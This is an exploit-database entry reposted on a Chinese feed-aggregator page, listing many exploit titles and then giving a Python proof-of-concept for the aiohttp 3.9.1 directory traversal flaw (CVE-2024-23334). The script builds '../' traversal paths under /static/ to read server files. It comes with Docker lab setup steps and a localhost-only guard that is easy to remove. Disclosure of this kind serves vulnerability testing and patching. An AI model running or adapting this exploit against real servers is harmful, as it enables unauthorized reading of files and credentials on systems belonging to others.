惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

V2EX - 技术
V2EX - 技术
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
T
Threat Research - Cisco Blogs
T
The Exploit Database - CXSecurity.com
S
Schneier on Security
S
Securelist
P
Privacy & Cybersecurity Law Blog
Scott Helme
Scott Helme
T
Threatpost
C
Cybersecurity and Infrastructure Security Agency CISA
L
LINUX DO - 热门话题
Cyberwarzone
Cyberwarzone
Cisco Talos Blog
Cisco Talos Blog
量子位
博客园 - Franky
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Latest news
Latest news
T
Troy Hunt's Blog
N
News | PayPal Newsroom
Google Online Security Blog
Google Online Security Blog
Apple Machine Learning Research
Apple Machine Learning Research
N
Netflix TechBlog - Medium
小众软件
小众软件
P
Palo Alto Networks Blog
Spread Privacy
Spread Privacy
C
Cyber Attacks, Cyber Crime and Cyber Security
C
Check Point Blog
aimingoo的专栏
aimingoo的专栏
WordPress大学
WordPress大学
L
Lohrmann on Cybersecurity
L
LINUX DO - 最新话题
D
Darknet – Hacking Tools, Hacker News & Cyber Security
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
The Last Watchdog
The Last Watchdog
S
Security @ Cisco Blogs
P
Privacy International News Feed
Last Week in AI
Last Week in AI
Microsoft Security Blog
Microsoft Security Blog
T
Tailwind CSS Blog
博客园_首页
云风的 BLOG
云风的 BLOG
V
Vulnerabilities – Threatpost
D
DataBreaches.Net
Recent Announcements
Recent Announcements
酷 壳 – CoolShell
酷 壳 – CoolShell
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
罗磊的独立博客
Engineering at Meta
Engineering at Meta
Forbes - Security
Forbes - Security
T
Tenable Blog

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
aiohttp 3.9.1 Directory Traversal - CXSecurity.com
2026-02-05 · via The Exploit Database - CXSecurity.com

aiohttp 3.9.1 Directory Traversal

# Exploit Title: Python aiohttp directory traversal PoC (CVE-2024-23334) # Google Dork: N/A # Date: 2025-10-06 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://www.aiohttp.org / https://www.python.org # Software Link: https://github.com/aio-libs/aiohttp (vulnerable tag: 3.9.1) # Version: aiohttp 3.9.1 (vulnerable) # Tested on: Linux (host for Vulhub / Docker) and inside container VM: aiohttp 3.9.1 # CVE: CVE-2024-23334 # Description: # Proof-of-concept to verify directory-traversal behavior when aiohttp is configured # to serve static files with follow_symlinks=True (affects aiohttp <= 3.9.1). # This PoC is intentionally restricted to local testing and will refuse non-local targets. # Environment setup (Vulhub example): # 1. Obtain Vulhub and change to the aiohttp 3.9.1 directory: # cd vulhub/python/aiohttp/3.9.1 # 2. Start the vulnerable service: # docker compose up -d # 3. Verify the service is accessible on localhost:8080: # curl -v http://localhost:8080/ # should respond # # Prepare a safe probe file inside the container (non-sensitive): # 1. Identify the container name or ID with `docker ps`. # 2. Create a test token file inside the container: # docker exec -it <container> /bin/sh -c "echo 'POC-AIOHTTP-VULN-TEST' > /tmp/poc-aiohttp-test.txt && chmod 644 /tmp/poc-aiohttp-test.txt" # 3. Verify: # docker exec -it <container> /bin/sh -c "cat /tmp/poc-aiohttp-test.txt" # # should print: POC-AIOHTTP-VULN-TEST # # How to run this PoC (local only): # 1. Save this file as poc_aiohttp_cve-2024-23334.py # 2. Run it on the host that has access to the vulnerable container's localhost port: # python3 poc_aiohttp_cve-2024-23334.py --port 8080 --probe /tmp/poc-aiohttp-test.txt --depth 8 # #!/usr/bin/env python3 """ Safe local-only PoC verifier for CVE-2024-23334 (aiohttp static follow_symlinks). This script will refuse to target any host other than localhost/127.0.0.1/::1. Example: python3 poc_aiohttp_cve-2024-23334.py --port 8080 --probe /tmp/poc-aiohttp-test.txt --depth 8 If the vulnerable server returns the probe file contents, the script prints the body and reports VULNERABLE. """ from __future__ import annotations import argparse import socket import sys import urllib.parse import http.client LOCAL_HOSTS = {"127.0.0.1", "localhost", "::1"} def is_localhost(host: str) -> bool: """Only allow local hosts to avoid misuse.""" return host in LOCAL_HOSTS def build_traversal_path(probe_path: str, depth: int = 8) -> str: """ Build a traversal-style path to append to /static/. Depth can be adjusted if the server root / static layout needs more ../ segments. """ probe = probe_path.lstrip("/") ups = "../" * depth return f"/static/{ups}{probe}" def try_connect(host: str, port: int, timeout: float = 3.0) -> bool: try: with socket.create_connection((host, port), timeout=timeout): return True except Exception: return False def send_get(host: str, port: int, path: str, timeout: float = 10.0): conn = http.client.HTTPConnection(host, port, timeout=timeout) try: conn.request("GET", path, headers={"User-Agent": "poc-aiohttp-check/1.0", "Accept": "*/*"}) resp = conn.getresponse() body = resp.read() return resp.status, body finally: try: conn.close() except Exception: pass def main(): parser = argparse.ArgumentParser(description="Local-only PoC verifier for aiohttp traversal (CVE-2024-23334).") parser.add_argument("--host", default="127.0.0.1", help="Target host (MUST be localhost).") parser.add_argument("--port", type=int, default=8080, help="Target port (default: 8080).") parser.add_argument("--probe", required=True, help="Absolute path on server to probe (e.g. /tmp/poc-aiohttp-test.txt).") parser.add_argument("--depth", type=int, default=8, help="Traversal depth (increase if needed).") parser.add_argument("--timeout", type=float, default=10.0, help="Request timeout seconds.") args = parser.parse_args() host = args.host.strip() port = int(args.port) if not is_localhost(host): print("ERROR: This PoC is restricted to localhost for safety. Use only in an isolated lab.", file=sys.stderr) sys.exit(2) # quick reachability check if not try_connect(host, port, timeout=3.0): print(f"ERROR: cannot reach {host}:{port}. Is the vulnerable server running and port exposed on localhost?", file=sys.stderr) sys.exit(3) path = build_traversal_path(args.probe, depth=args.depth) # encode path but keep slash and common safe chars path = urllib.parse.quote(path, safe="/?=&%") print(f"[*] Sending GET {path} to {host}:{port} (local lab only)") status, body = send_get(host, port, path, timeout=args.timeout) print(f"[+] HTTP {status}") if body: try: text = body.decode("utf-8", errors="replace") except Exception: text = repr(body) print("----- RESPONSE BODY START -----") print(text) print("----- RESPONSE BODY END -----") # heuristic: check for the expected test token if "POC-AIOHTTP-VULN-TEST" in text: print("[!] VULNERABLE: test token found in response (lab-confirmed).") sys.exit(0) else: print("[ ] Test token not found in response. The server may not be vulnerable or probe path/depth needs adjustment.") sys.exit(1) else: print("[ ] Empty response body.") sys.exit(1) if __name__ == "__main__": main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}